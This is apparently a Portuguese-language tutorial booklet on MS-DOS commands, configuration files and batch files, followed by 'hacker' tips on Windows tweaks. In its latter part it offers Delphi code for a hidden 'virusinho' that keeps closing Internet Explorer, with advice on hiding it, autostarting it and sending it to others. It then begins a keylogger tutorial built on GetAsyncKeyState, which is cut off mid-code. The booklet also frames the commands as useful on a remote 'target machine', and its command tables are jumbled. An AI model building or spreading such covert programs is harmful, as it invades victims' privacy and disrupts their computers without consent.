Assim como o PKZip® (os dois trabalham em conjunto), o PKUnzip® também está relacionado com compactação de dados, porém sua função é inversa, i.é., descompactar dados compactados pelo PKZip®. Sua sintaxe é: PKUnzip arqzip [arquivos] • arqzip - arquivo .ZIP que contém os dados a serem descompactados. • arquivos - arquivos a serem descompactados. Se este parâmetro não for especificado, todos os arquivos do arquivo .ZIP especificado serão descompactados. Exemplo: PKUNZIP AMPRO (Descompacta todos os arquivos contidos no arquivo AMPRO.ZIP) Nota: A descompactação não apaga o arquivo .ZIP.

3.25. Md
Este comando é a forma abreviada do comando “mkdir” e serve para criar um diretório. Md [drive:] caminho • drive: - é o drive onde se deseja criar o novo diretório. • caminho - nome e localização do novo diretório. O tamanho máximo para o nome e a localização de um subdiretório é de 63 caracteres, incluindo as barras invertidas (\). Exemplo: no caso acima, o comando digitado foi MD VARIOS (levando em conta que o diretório atual é C:\UTIL).

3.26. Cd
É a forma abreviada do comando “chdir”, que tem como função mudar o diretório corrente. Sua sintaxe é: Cd [drive:] caminho Cd [..] [caminho] Cd [\] [caminho] • drive: caminho - diretório para o qual se deseja mudar. • .. - muda para o diretório imdeiatamente anterior ao atual. • \ - volta direto para a raiz do drive atual. Exemplo: CD VARIOS (Entra em um diretório chamado VARIOS)

3.27. Rd
O comando rd (abreviação de “rmdir”) realiza o inverso do comando md. Ele apaga um diretório. O diretório a ser apagado deve estar vazio e não pode ser o diretório corrente. Sua sintaxe é: Rd [drive:] caminho • drive: caminho - localização do diretório a ser deletado. Exemplo: RD C:\UTIL\VARIOS (Apaga o diretório VARIOS que está dentro do UTIL no drive C:)

3.28. Tree
Este comando (em inglês significa árvore) tem como objetivo apresentar ao usuário a estrutura (árvore) de diretórios de um determinado disco. Sua sintaxe é: Tree [drive:] [caminho] [/F] [/A] [|more] • • • • drive: - é o drive que contém o disco do qual desejamos visualizar a estrutura. caminho - é o diretório do qual queremos ver a estrutura. /F - mostra os arquivos contidos em cada diretório da estrutura a ser mostrada. /A - diz ao DOS para usar caracteres de texto ao invés de caracteres gráficos para mostrar as linhas que ligam os subdiretórios entre si. Use este parâmetro quando a árvore do diretório for ser impressa em uma impressora que não interprete corretamente os caracteres gráficos (no caso da informação ser redirecionada para a impressora ao invés do vídeo).

• |more - podemos ainda usar este parâmetro, que produz um pausa quando a tela ficar cheia, esperando o acionamento de uma tecla para prosseguir. Exemplo: TREE |MORE (Exibe a árvore de diretórios pausadamente)

3.29. Prompt
Com esse comando, você pode mudar a aparência do prompt do DOS, isto é, você pode personalizar o prompt do seu computador. A sintaxe do comando prompt é: Prompt [texto] • texto - descreve qualquer texto ou informação que você quiser colocar no seu prompt. Abaixo segue uma tabela com os parâmetros que você pode usar junto com o texto que você quer ou no lugar dele. Combinações $Q $$ $T $D $P $V $N $G $L $B $_ $E $H Resultado = (sinal de igualdade) $ (sifrão) Hora atual Data atual Drive e caminho atuais Versão do DOS Drive atual > (maior que) < (menor que) | (barra vertical ou pipe) ENTER-LINEFEED ESC (ASCII 27) BS (backspace)

Exemplo: PROMPT $P$G (Faz com que o prompt passe a apresentar o caminho seguido por um sinal de “maior que”)

3.30. Deltree
Este comando apaga um diretório e todos os arquivos e subdiretórios contidos nele, bem como os arquivos contidos em seus subdiretórios. Sua sintaxe é: Deltree [drive:] caminho [[drive:] caminho...] • drive: caminho - é o diretório a ser deletado. Podemos especificar mais de um diretório. Exemplo: DELTREE C:\LOTUS (Apaga o diretório LOTUS do drive C: e todos os seus subdiretórios e arquivos)

3.31. Xcopy
Assim como o comando copy, o Xcopy copia arquivos, porém ele é mais rápido e tem uma outra vantagem: ele pode copiar não só os arquivos do diretório atual como também dos seus subdiretórios. Sua sintaxe é: Xcopy origem [destino] [/S] [/E] • origem - é aonde estão os arquivos a serem copiados. • destino - é para onde os arquivos serão copiados. • /S - copia também os subdiretórios da origem especificada, menos os subdiretórios vazios. Se for omitido, o Xcopy trabalhará somente no diretório especificado como origem. • /E - copia também os subdiretórios da origem especificada, mesmo que estejam vazios. Exemplo: XCOPY A:*.* C:/E (Copia todos os arquivos e subdiretórios, vazios ou não, do drive A: para o drive C: )

4. Arquivos de Configuração do Sistema
4.1. CONFIG.SYS
Esse é o arquivo pelo qual o DOS procura logo após o boot. Ele contém instruções que o DOS necessita para trabalhar com o seu computador e sua memória, bem como com seus dispositivos e seus programas de uma forma geral. Os comandos que o seu CONFIG.SYS contém relacionam-se com o seu hardware, informando ao seu computador como ele deve administrar o seu equipamento. Caso você instale um novo programa ou um outro dispositivo ao seu computador, provavelmnte modificações se farão necessárias para que o bom funcionamento da máquina continue ocorrendo. Os comandos que nós usamos no CONFIG.SYS não podem ser usados no AUTOEXEC.BAT ou no prompt do DOS, pois são específicos para uso neste arquivo. Eles encontram-se relacionados na seção 5.

4.2. AUTOEXEC.BAT
O AUTOEXEC.BAT é um exemplo muito especial de arquivo batch, pois logo após encontrar e executar o CONFIG.SYS o DOS procura este arquivo. Nele você pode incluir linhas de comando do DOS (nunca do CONFIG.SYS!), além de um certo tipo de programa denominados TSR ( do inglês Terminate and Stay Resident, isto é, termina a execução e permanece na memória). Os comandos usados no AUTOEXEC.BAT encontram-se na seção 5.

5. Comandos Para “Batch Files” e Configuração do Sistema
“Batch Files” são arquivos que agrupam comandos do DOS e/ou comandos exclusivos para uso neste tipo de arquivo. Eles são muitos úteis na hora de executarmos determinadas tarefas que exigem sempre uma mesma sequência de comandos, por exemplo: desejamos ver o conteúdo de um determinado arquivo de texto, ativando uma pausa cada vez que a tela ficar cheia e, em seguida, o copiaremos para o drive B:. Normalmente, seríamos obrigados a digitar duas linhas de comando cada vez que fôssemos fazer isso, mas com um “batch file” (ou arquivo de lote, ou ainda arquivo .BAT) digitaremos somente o nome deste arquivo, o qual executará as duas funções para nós. Seu nome será sempre da seguinte forma: nome.BAT, não sendo necessária a inclusão da extensão ao digitarmos o nome do arquivo para executá-lo.

5.1. Copy Con
Este parâmetro do comando copy diz ao DOS para copiar tudo o que você digitar para um arquivo cujo o nome é escolhido na linha de comando. O parâmetro CON (de CONsole, que para o computador é o teclado) redireciona a origem dos dados para o teclado, e não para um disco, como de costume. Veja a sintaxe: Copy con arquivo • arquivo - é o nome (com ou sem uma extensão) do arquivo no qual será armazenado tudo o que você digitar. Após o término da digitação, basta digitarmos CTRL+Z (ou F6) que aparecerá na tela o símbolo “^Z”, que o DOS interpreta como uma marca de final de arquivo. Em seguida, o DOS grava o arquivo em disco. Este comando nos permite não só criar arquivos .BAT como também arquivos .TXT ou .DOC (arquivos de texto). Exemplo: COPY CON LEIA-ME.TXT (Gravará em um arquivo chamado LEIA-ME.TXT tudo que for digitado do teclado desde a execução desta linha de comando até que seja pressionada a combinação de teclas CTRL+Z) 5.2. @ O caractere @ (arroba) tem a finalidade de omitir a apresentação de um comando na tela quando estamos executando um arquivo “batch”. Observe o exemplo a seguir:

Usando e não usando o @: TESTE.BAT ECHO COMANDOS DO MS-DOS E MUITO MAIS APOSTILA DE NELIO JALOTO @ ECHO COMANDOS DO DOS Na tela apareceria o seguinte quando executássemos o arquivo TESTE.BAT: C:\>ECHO COMADOS DO MS-DOS E MUITO MAIS APOSTILA DE NÉLIO JALOTO Note que como o primeiro comando não foi precedido por @, ele apareceu na tela (como se nós tivéssemos digitado) e em seguida o resultado da sua execução. Já o segundo (foi precedido por @) não apareceu na tela, somente o que ele faz.

5.3. Edit
EDIT - é o editor de texto do DOS, apesar de perder de longe do WORD ou outro editor de texto, o EDIT é conveniente por ser simples e é padrão do DOS a partir da versão 5.0, com o EDIT o usuário pode ler, criar, imprimir, entre outros, arquivos-texto e arquivos de lote, com a vantagem de ser uma maneira rápida e fácil. Este comando do DOS executa um processador de textos bem simples que vem com o DOS, onde você pode digitar o seu arquivo texto ou .BAT com alguns recursos a mais do que o comando “copy con” lhe porporciona. Nele você pode voltar para as linhas anteriores do arquivo, coisa que você não pode fazer se usar o copy con. Caso o arquivo já exista, o MS-DOS Editor mostrará para você o conteúdo dele. A sintaxe é a seguinte: Edit [arquivo] [/H] • arquivo - drive, caminho e nome do arquivo a ser editado. • /H - executa o MS-DOS Editor apresentando o número máximo de linhas no vídeo que o seu equipamento pode suportar. Quando você acabar de digitar o seu texto (ou a sequência de comandos que você deseja no seu arquivo .BAT), basta você teclar ALT+F para entrar no menu de operações com arquivos e em seguida teclar S para salvar seu arquivo com o nome que você deu ou, caso você não tenha dado um nome para o arquivo (você apenas digitou edit no DOS), entre com o nome quando ele pedir. Para sair do MS-DOS Editor basta teclar ALT+F e em seguida X.

Exemplo: EDIT LEIA-ME.TXT (Permite a digitação do arquivo LEIA-ME.TXT) O EDIT não fornece condições para acentuar palavras, nem tem alinhamento automático entre as margens, mas podemos copiar, colar ou ainda busca de texto. Surgirá na tela do vídeo a apresentação do EDIT com duas opções: visualizar o Guia de Utilização pressionando a tecla ENTER, ou simplesmente pressionando a tecla ESC para começar a editoração do texto. Na primeira linha temos os menus, onde cada um tem alguns comandos listados a seguir: a) Menu ARQUIVO ou FILE, comandos: Novo - abre uma nova janela para um novo texto Abrir - abre um arquivo já existente Salvar - salva o atual texto usando o nome atual do arquivo Salvar Como... - salva o atual texto solicitando um nome para ele Imprimir - imprimi o atual texto ou a parte marcada Sair - finaliza o EDIT, se o atual texto não foi salvo, antes de finalizar, o EDIT pergunta se o usuário quer salvar o texto. b) Menu EDITAR ou EDIT, comandos: Recortar - recorta a parte marcada do texto (comando de atalho SHIFT-DEL) Copiar - copia a parte do texto marcada (comando de atalho CTRL-INS) Colar - cola um texto previamente copiado (comando de atalho SHIFT-INS) Apagar - apaga (deleta) o texto marcado (tecla de atalho DEL) c) Menu LOCALIZAR ou SEARCH, comandos: Procurar - procura um texto especificado, o usuário especifica o texto ou palavra que queira encontrar no texto, podendo diferenciar ou não de maiúsculas e minúsculas, este comando tem uma tela especifica que aparece quando solicitado o comando Repetir a última procura - repete a última procura Alterar - altera uma série de caracteres por outra que o usuário queira

5.4. Path
Este comando diz ao DOS onde ele deve procurar por arquivos executáveis. Quando você entrar com o nome de um arquivo para executá-lo o DOS o procurará no diretório corrente e, se forem especificados outros diretórios com o comando path, em seguida nos outros diretórios especificados. Sua sintaxe é: Path [[drive:] caminho [;...]] • drive: - drive onde está o diretório a ser especificado. • caminho - diretório a ser especificado. Exemplo: PATH C:\DOS;C:\WINDOWS;C:\WINWORD (Especifica como caminho de procura os diretórios DOS, WINDOWS e WINWORD, todos do drive C:) Nota1: Repare que um diretório será sempre separado do outro por um “;”. Nota2: Se digitarmos somente PATH no prompt do DOS, ele nos retorna todos os diretórios nos quais ele irá buscar arquivos executáveis (caso sejam especificados). Nota3: No caso de existirem arquivos com o mesmo nome, divergindo somente na extensão (por exemplo AMPRO.COM e AMPRO.BAT), o DOS seguirá a seguinte ordem de prioridade: 1º - .COM, 2º - .EXE e 3º - .BAT. Portanto, se existirem os dois arquivos do exemplo e você estiver interessado somente no .BAT, você deverá digitá-lo com a extensão, caso contrário o DOS executará o AMPRO.COM.

5.5. Device
Carrega para a memória o driver (controlador de dispositivo) que você especificar, podendo ser somente usado no CONFIG.SYS. Sua sintaxe é: Device=[drive:] [caminho] arquivo [parâmetros] • [drive:] [caminho] - localização do driver. • arquivo - nome do driver. • parâmetros - qualquer informação requisitada pelo driver em sua linha de comando. Exemplo: DEVICE=C:\DOS\HIMEM.SYS (Carrega para a memória o controlador HIMEM.SYS)

5.6. Echo
Este comando liga ou desliga o eco do DOS. Quando o DOS está executando um arquivo .BAT ele ecoa (apresenta) no vídeo a linha de comando que está sendo executada. Para impedir o DOS de ecoar as linhas de comando, basta usarmos o comando echo para desligarmos o eco usando a seguinte sintaxe: Echo [ON|OFF] • ON|OFF - liga (ON) ou desliga (OFF) o eco. Exemplo: ECHO OFF (Desliga o eco) Nota: Para sabermos se o eco está ligado ou desligado, basta digitarmos o comando echo se nenhum parâmetro e ele nos retorna o estado do eco. Podemos usar este comando também para apresentar uma mensagem qualquer no vídeo, usando a sintaxe a seguir:

Echo mensagem • mensagem - é a mensagem a ser ecoada no vídeo. Exemplo: ECHO HACKERS COMO LIDAR COM ELES SEGUNDA EDIÇAO MS-DOS (Apresenta no vídeo a mensagem HACKERS ... ) Nota1: Para ecoarmos um linha em branco no vídeo, digitamos ECHO. (sem espaços entre o ponto e o comando). Nota2: Caso queiramos que o DOS não ecoe apenas uma (ou aglumas) linha(s) de comando, não precisamos desligar o eco. Basta colocarmos o caractere arroba (“@”) antes da dita linha.

5.7. EMM386
Esse programa é um gerenciador de memória expandida para computadores 386 ou de maior capacidade. Ele permite o acesso à área de memória alta e usa a memória estendida para simular memória expandida. O EMM386.EXE deve ser carregado utilizando-se o comando device no arquivo CONFIG.SYS.

5.8. Buffers
Reserva memória para um número especificado de buffers de disco no momento da inicialização do sistema. Somente pode ser usado no CONFIG.SYS. Sua sintaxe é a seguinte: Buffers=x[,y] • x - especifica o número de buffers de disco. X deve estar entre 1 e 99. • y - especifica o número de buffers no cache de buffers secundário. Seu valor deve ser no mínimo 0 e no máximo 8. Exemplo: BUFFERS=20 (Cria 20 buffers de disco)

5.9. Files
Este comando especifica o número de arquivos que o DOS pode acessar ao mesmo tempo. Só pode ser usado no CONFIG.SYS. Sua sintaxe é: Files=n • n - número de arquivos que o DOS pode acessar ao mesmo tempo. Seu valor pode variar de 8 a 255. Se não for especificado, o DOS assume n=8. Exemplo: FILES=12 (Especifica 12 arquivos como número máximo de arquivos que podem ser abertos simultaneamente)

5.10. Devicehigh
Carrega para a memória alta o driver (controlador de dispositivo) que você especificar, podendo ser somente usado no CONFIG.SYS. Carregando um driver para a memória alta, ficamos com mais memória convencional disponível, podendo executar programas maiores. Caso não tenha mais espaço na memória alta, o devicehigh funcionará exatamente como o device. Sua sintaxe é: Devicehigh=[drive:] [caminho] arquivo [parâmetros] • [drive:] [caminho] - localização do driver. • arquivo - nome do driver. • parâmetros - qualquer informação requisitada pelo driver em sua linha de comando. Exemplo: DEVICEHIGH=C:\DOS\EMM386.EXE (Carrega para a memória alta o controlador EMM386.EXE)

5.11. DOS
Este é outro comando do DOS que só funcionará se estiver no seu arquivo CONFIG.SYS. Sua função é especificar se o DOS deve manter uma ligação com a área de memória alta, carregar parte de si mesmo nela ou ambos. Sua sintaxe é: Dos= HIGH|LOW [,UMB|,NOUMB] Dos= [HIGH|LOW,] UMB|NOUMB • HIGH|LOW - indicam se o DOS deve ou não se transferir para a memória alta. Caso você omita a opção ou especifique LOW, o DOS será carregado na memória convencional. • UMB|NOUMB - especificam se o DOS deve manter ou não uma ligação com a região de memória alta, permitindo que controladores de dispositivos sejam colocados na área de memória superior. Exemplo: DOS=HIGH (Carrega boa parte do DOS para a memória alta)

5.12 Pause
Suspende o processamento de um arquivo de lote (arquivo “batch”) até que o usuário pressione uma tecla qualquer para continuar. Sua Sintaxe é: Pause

6. Outros Comandos
6.1. DOSShell
O DOSShell é um programa que vem com o DOS (em algumas versoes) que faz as mesmas coisas que o DOS faz, porém em um ambiente gráfico. Não nos convém entrar em detalhes sobre o DOSShell, pois o curso é voltado para o aprendizado de MS-DOS, mas fica o comentário sobre ele. Falar sobre o DOSShell agora só dificultaria o aprendizado ao invés de facilitá-lo. Para entrar no DOSShell basta digitarmos: Dosshell [/T|/G] [/B]

• /T - inicializa o DOS Shell em modo texto. • /G - inicializa o DOS Shell em modo gráfico. • /B - inicializa o DOS Shell em preto e branco. Exemplo: DOSSHELL /B

6.2. Help
Mostra um help do comando especificado. Se for especificado sem nenhum comando, apresenta uma lista dos comandos disponíveis. Sintaxe: Help comando • comando - qualquer comando do DOS. Exemplo: HELP ATTRIB (Mostra um texto explicativo sobre o comando ATTRIB)

6.3. Scandisk
Este comando inicia a execução do programa Microsoft Scandisk, uma ferramenta cuja função é muito parecida com a do CHKDSK, porém muito mais confiável. Ele detecta vários tipos de problemas diferentes que podem ocorrer no disco e tenta corrigí-los. Para utilizarmos o Scandisk, basta usarmos a seguinte sintaxe: Scandisk [drive:] [/AUTOFIX] • drive: - diz ao Scandisk qual o drive a ser analisado. • /AUTOFIX - checa o disco e conserta os defeitos que encontrar automaticamente, sem perguntar se deve ou não consertar. Exemplo: SCANDISK /AUTOFIX (Executa o Scandisk no drive atual, permitindo que ele tente corrigir automaticamente todos os erros que encontrar) Nota: se não especificarmos o drive, o Scandisk analisará o drive atual.

6.4. Set
Mostra, ajusta ou remove as variáveis de sistema. Podemos usar as variáveis de sistema para controlar o comportamento de alguns arquivos batch ou de alguns programas. Podemos ainda usá-las para ajustar a maneira como o DOS aparece e trabalha. Normalmente, usamos o comando set no AUTOEXEC.BAT (falaremos sobre ele mais adiante) para o DOS já iniciar a sessão de trabalho com as variáveis devidamente ajustadas, mas podemos usá-lo no DOS também. Sua sintaxe é: Set variável=[string] • variável - é o nome da variável a ser ajustada. • string - é o valor que a variável irá conter. Exemplo: SET DIRCMD=/p /o (Faz com que a variável DIRCMD contenha o valor /P /O) Nota1: Se não especificarmos valor nenhum e a variável já existir com algum valor, ela será apagada. Nota2: Se digitarmos somente set sem parâmetro nenhum, o comando nos retornará uma lista de todas as atuais variáveis de sistema e seus respectivos valores.

Abaixo apresentamos uma lista de comandos do MS-DOS, com um resumo sobre cada uma deles. Veja que isto é só um resumo, que dá uma rápida noção, somente para que você vá ao Help já sabendo o que vai pesquisar. Sempre que vir neste texto a observação “Verifique no Help´”, é porque há coisas muito mais importantes para se ver a respeito do comando. Vá até o Help e só execute o comando se tiver certeza que o entendeu bem.

6.5. Comandos do MS-DOS na versão 6.22

COMANDOS Append Attrib Break Buffers Call Cd Chcp Chdir Chkdsk Choice Cls Command Copy Country Ctty Date Debug

RESUMO SOBRE O COMANDO Possibilita que um programa abra um arquivo de dados em outro diretório como se estivesse dentro dele. Mostra os atributos de um arquivo, podendo alterá-los também. Ativa ou desativa a ação de Crtl + C Aloca a memória Permite que se chame um programa de lote, estando em outro. Call faz isso sem sair do primeiro programa. Muda o diretório atual ou simplesmente o exibe. Define o número de página de código ativa. Muda o diretório atual ou simplesmente o exibe. Cria um relatório sobre um disco e o exibe. Solicita que se escolha um programa de lote. Limpa a tela. Inicia uma nova versão do interpretador de comandos de comandos do MS-DOS. Copia arquivos para o outro local. Permite a utilização de formatos de data, hora e moedas em níveis internacionais. (Verifique no Help como usá-lo) Altera o dispositivo de terminal usado para controlar seu computador. Exibe a data e permite alterá-la. Inicia um programa chamado Debug que permite verificar os arquivos executáveis. Reorganiza um disco para aumentar o desempenho, permite

Devicehigh Dir Diskcomp Diskcopy Dos Doshelp Doskey Drvspace Drivparm Echo Edit Emm.386 Erase Exit Expand Fastopen FC Fcbs Fdisk Files Find For Format Goto Graphics Help If Include Install Interink Intersvr Keyb Label Lastdrive Loadfix Loadhigh Md Mem Memmaker Menudefault Mode More Move Msav Msbackup Mscdex Msd Nisfunc

Carrega os controladores de dispositivo na memória alta. Mostra a lista dos arquivos de um diretório. Compara o conteúdo de dois discos flexível. Copia todo o conteúdo de arquivos de uma unidade para outra. Carregar parte do Dos na área de memória alta. Mostra um resumo de todos os comandos do MS-DOS. Carregar para a memória o programa doskey. Permite que se crie macros e se edite linhas de comandos. Aumente o espaço em uma unidade. Verifique tudo a respeito deste comando antes de usá-lo. Define os parâmetros para dispositivos de bloco. Indica se o recurso de repetição de comando está ativado ou desativado. Inicia o Editor MS-DOS. Permite o suporte de memória expandida. O mesmo que DEL. Permite sair do programa comman.com. Expande um arquivo compactado. Inicia o programa Fastopen. Compara dois arquivos e mostra a diferença entre eles. Este comando permite especificar o número de blocos de controle de arquivos. Inicia o programa Fdisk, o qual configura um disco rígido a ser usado com o MS-DOS. Específica o número de arquivos que podem ser acessados ao mesmo tempo pelo MS-DOS. Pesquisa uma seqüência de texto especificada. Executa um comando especificado para arquivos de um conjunto de arquivos. Formatar um disco a ser usado com o MS-DOS. Leva o MS-DOS para uma determinada linha em um programa de lote marcada por um nome especificado. Carrega um programa que permite o conteúdo de sua tela de computador. Inicia a ajuda do MS-DOS. Executa o processamento condicional em programas de lote. Inclui o conteúdo de um bloco de configurações. Carrega dentro da memória um programa residente na memória Conecta dois computadores através de portas paralelas. Inicia o servidor Interink. Inicia um programa que configura o teclado para uma língua específica. Cria, altera ou exclui o título (nome) do volume de um disco. Específica o número máximo de unidades que podem ser acessados. Assegura que um programa seja carregado acima dos 64k iniciais de memória convencional. O mesmo que “Lh”, carrega um programa dentro da memória superior. O mesmo que Mkdir. Cria um diretório. Exibe a quantidade de memória utilizada e disponível de seu computador. Inicia o programa Memmaker, que otimiza a memória do seu computador. Específica um item no menu padrão. Configura uma placa de impressão. Exibe de uma vez uma tela de saída. Move um ou mais arquivos para um local especificado. Inicia o Microsft Anti-Vírus. Cria cópias de segurança ou recupera um ou mais arquivos. Fornece acesso a controladores de CD-ROM. Fornece informações sobre o computador, qual é o microprocessador, monitor etc. Inicia o programa que carrega informações do pais para suporte

Share Shell Shift

Inicia o programa Share, que propicia o computador de arquivos. Especifica o nome e a posição do interpretador de comandos a ser usado. Altera a posição de parâmetros substituíveis em um programa de lote. Quando usado em uma linha do arquivo Autoexec.Bat, cria um cache de disco na memória estendida. Este cache permite um acesso rápido ao disco rígido. Lê entradas, classifica dados e grava os resultados da tela, em um arquivo ou em outro dispositivo. Permite o uso dinâmico de pilhas de dados para gerenciar interrupções de hardware. Define um item do menu de inicialização que quando selecionado, exibe outro conjunto de opções. Associa um caminho a uma letra de unidade. Oferece opções especiais. Cria um novo disco de inicialização. Altera a hora do sistema. Mostra a estrutura de diretórios. Mostra o conteúdo de um arquivo de texto. Restaura arquivos anteriormente excluídos. Restaura um disco apagado pelo comando Format. Mostra a versão do MS-DOS. Informa o MS-DOS para verificar se seus arquivos foram gravados corretamente em um disco. Exibe o nome do volume. Verifica continuamente o computador quando à vírus e exibe uma advertência ao localizar um. Copia arquivos, diretórios, subdiretórios.

Smartdrv

Sort Stacks Submenu Subst Switches Sys Time Tree Type Undelete Unformat Ver Verify Vol Vsafe Xcopy

Para você pensar: Nesta apostila sobre o DOS imagine vc estando em um pc remotamente,com esse comando estudados você poderar fazer muitas coisas na maquina alvo,e portanto é bom aprender os comando por que você nao sabe quando vai ser usado. É legal tambem que o aluno viage na materia, é so ter um pouco de logica na hora que você for fazer um arquivo .bat,como si fosse programar um programa etc...

Momento EXPlorando e aprendendo Por Nélio jaloto e Marcos Elias Virusinho que não deixa usar o Internet Explorer! (em Delphi)
Um ano de Explorando e Aprendendo... Soltando o espírito geeeek e zuador par forah!!! ++ dicas ouZadas pra vc! Por Marcos Elias E como boas coisas se conseguem com bons recursos... Essa dica eh de programação em Delphi. Rapidinha... Mas muitho doooooida!!! QUE TAL IMPEDIR O USO DO INTERNET EXPLORER? Pois bem... você pode usar na empresa, para que ninguem use esse navegador.. ou pode fazer um "brinquedinho" e mandar pro seu chefe, ex-namorada, professora, amigo, sogra, famil... BZZZZZZZZ vamos la... Mostrarei como criar um programinha no delphi que fecha TODAS as janelas do internet explorer, SEM INTERVENÇÃO DO USUÁRIO. é basicamente um programa que envia uma mensagem pro IE como se fosse o windows ou outro programa sério quer... soh que ele manda a mensagem de fechar e o IE, sendo um programa obediente, fexa.. [na real quem fecha o IE é o windows, o sistema operacional, afinal é ele quem controla a execução dos programas e a transferência de dados entre eles... e isso funcionaria em teoria com quer programa, basta ter o nome de alguma classe que ele usa ou o handle dele na sessão atual..] Saiba que: "handle" é um número de indentificação para determinados componentes de programas, visuais ou não, que o windows gerencia para poder manipular os programas... por exemplo ao maximizar, minimizar ou fechar uma janela, o windows usa o handle dela para poder ocultá-la ou mostrá-la na tela, mostrar ou não o botão dela na barra de tarefas, etc.. os handles são fornecidos pelo sistema operacional (que tambem usa muitos handles para controle dos seus processos) conforme os programas vão sendo abertos, e libera os números quando não sao mais usados. assim um programa naum tem um handle fixo. o identificador do handle vale apenas numa sessão do programa...

procedure TForm1.Timer1Timer(Sender: TObject); var tchauIE : Thandle; begin while tchauIE <> 0 do begin tchauIE := FindWindow('IEFrame',nil); SendMessage(tchauIE,WM_SYSCOMMAND,SC_CLOSE,0); end; CloseHandle(tchauIE); end; Nao se esqueça de declarar a variável "tchauIE", que armazenará temporariamente o handle de todas as janelas que tenham o componente "ieframe" (q eh o quadro de navegação do ie). Se quiser, diminua o interval do timer tbm.. É issu!!! Rode o programa e tente abrir o IE... nao dará!!! e todas os que estiverem abertos são fechados. explorando ainda ++: em vez de SC_CLOSE como parâmetro, você pode uzar: SC_MAXIMIZE, para que o programa sempre seja maximizado (nao dará pra minimizar nem deixar a janela num tamanho menor) SC_MINIMIZE, para minmimizar.. assim o ie soh ficará minimizado! a pessoa nao vai conseguir uzar e vai ficar louuuca!!! procure por + coizas por você mesmo... Você pode programar um instalador oculto e colocar esse programinha pra se iniciar sempre junto com o windows, daih poderia ser considerado um víruzinho.. rs coitadas das pessoas. o firefox bem q podia usar um código assim enquanto ele tah sendo eZecutrado neh?! nao é o IE que é o bam bam bam? pois bem.. rs Dica: se quiser deixar seu programa 100% OCULTO (jah que ele mostraria o Form1), clique em "Project > ViewSource" e coloque depois do Application.Initialize: Application.ShowMainForm := False; Mas ai pra fechar você deve usar o gerenciador de tarefas.. se você manjar legalz pode criar o timer em tempo de execução, diretamente no cod fonte do projeto, aih ele fika pekinininhu.. claro remova o form1 e eXClua da uses tudo o que for supérfulo. se você nao entendeu nada ientao essa mensagem nao foi pra voêc. Lembro que se kizer compactar o .exe num outro .exe automático e menor, use o UPX com o KebraByte, um compressor de executáveis gratuito: kebrabyte.mepsites.cjb.net. Dicas ++: vc pode usar qualquer outra coiza no lugar de "IEFrame"... tipo se colocar "notepad" dai fexa o bloco de notas... "TfrmMepTexto" fexa o meu mep texto.. explore + nomes de classes de outros programas que você queira fechar ou impedir o uso, com o "WinSight32", que vem com o delphi (no menu dele no iniciar > programas) boa sorte!!!

Desabilite alguns baloes de avisos no windows!!!
Por Nélio Jaloto Se você deseja desabilitar aqueles "balões de aviso" que aparecem sempre que o sistema executa alguma função específica, faça o seguinte: Execute o regedit.exe (iniciar executar "regedit") e vá na chave HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Explorer Advanced, clique no menu Editar / Novo / Valor DWORD digite EnableBaloonTips e pressione Enter em seu teclado. Se já houver essa variável ali, altere o seu valor para 0 (zero). A partir da próxima inicialização, os balões não serão mais exibidos;

Como liberar 20% de sua banda de rede/Internet:
Por Nélio jaloto Há um recurso no Windows XP, chamado "Agendador de pacotes QoS", que reserva 20% da banda disponível de rede e Internet para uso próprio. Para desabilitá-lo é necessário estar logado como Administrador executar os seguintes passos: Vá em Iniciar / Executar e digite gpedit.msc e pressione OK. Após isso, vá em Configuração do computador / Modelos Administrativos / Rede e selecione na janela de esquerda Agendador de pacotes QoS. Na janela da direita, dê duplo-clique em Limite de reserva de banda. Depois, vá na aba Configuração e selecione Ativado. Na linha Limitar % da banda, digite 0 (zero). Clique em Aplicar e em OK. Agora vá ao Painel de Controle /Conexões de Rede, clique com o botão direito na conexão existente e selecione Propriedades. Na aba Geral, habilite o Agendador de Pacotes QoS. Se já estiver habilitado, deixe-o assim. O último passo é reiniciar o computador. Se houver mais de um computador em rede, é preciso seguir este procedimento em todos para que haja um real benefício desta dica.

Remova o amarelao que o windows deixa no iniciar
Por Nélio Jaloto O Windows marca os programas mais recentes que foram instalados no menu Iniciar com uma cor amarelada. Para desativar esse

recurso: Clique com o botão direito do mouse na Barra de Tarefas Escolha Propriedades > Menu Iniciar > Personalizar> Avançado Desmarque a caixa "Realçar programas recém-instalados"

Tirando as setas dos seus ícones de atalho
Por Nélio Jaloto É so vocês editar o registro. Escolha o item HKEY_CLASSES_RootLnkfile. Delete a chave IsShortcut. Uma maneira mais fácil de se conseguir isso é instalando o programa Powertoys.

Dica: Como criar um keylogger! (em Delphi)
por Marcos Elias Essa dica de Delphi é muuuuito boa! Um tempão atrás disso... Finalmente achei algo significante... Use por sua conta e risco!!! Um método fácil de capturar TUDO O QUE É DIGITADO no computador com Windows, ou seja, um método fácil de criar um keylogger. É uma dica de programação, portanto não é para qualquer um. Uso o Borland Delphi 7, deve funcionar em diversas outras versões também... Como é avançada, apesar de relativamente fácil, não vou comentar muito, ok? Inicie o Delphi e crie um novo projeto. Insira um Memo e um Timer. No código, defina a seguinte função: function Coloca(txt: String): String; begin Form1.Memo1.Text := Form1.Memo1.Text + txt; end; E coloque no evento Timer do temporizador: procedure TForm1.Timer1Timer(Sender: TObject); var keyloop, KeyResult : Integer; begin keyloop := 0; repeat KeyResult := GetAsyncKeyState(keyloop); if KeyResult = -32767 then begin case keyloop of 8: Coloca(' [BACKSPACE] '); 9: Coloca(' [TAB] '); 12: Coloca(' [ALT] '); 13: Coloca(' [ENTER] '); 16: Coloca(' [SHIFT] '); 17: Coloca(' [CONTROL] '); 18: Coloca(' [ALT] '); 20: Coloca(' [CAPS LOCK] '); 21: Coloca(' [PAGE UP] '); 27: Coloca(' [ESC] '); 33: Coloca(' [PAGE UP] '); 34: Coloca(' [PAGE DOWN] '); 35: Coloca(' [END] '); 36: Coloca(' [HOME] '); 37: Coloca(' [SETA ESQUERDA] '); 38: Coloca(' [SETA ACIMA] '); 39: Coloca(' [SETA DIREITA] '); 40: Coloca(' [SETA ABAIXO] '); 45: Coloca(' [INSERT] '); 46: Coloca(' [DEL] '); 91: Coloca(' [WIN ESQUERDA] '); 92: Coloca(' [WIN DIREITA] '); 93: Coloca(' [MENU POP-UP] '); 96: Coloca('0'); 97: Coloca('1'); 98: Coloca('2'); 99: Coloca('3'); 100: Coloca('4'); 101: Coloca('5'); 102: Coloca('6'); 103: Coloca('7'); 104: Coloca('8'); 105: Coloca('9');

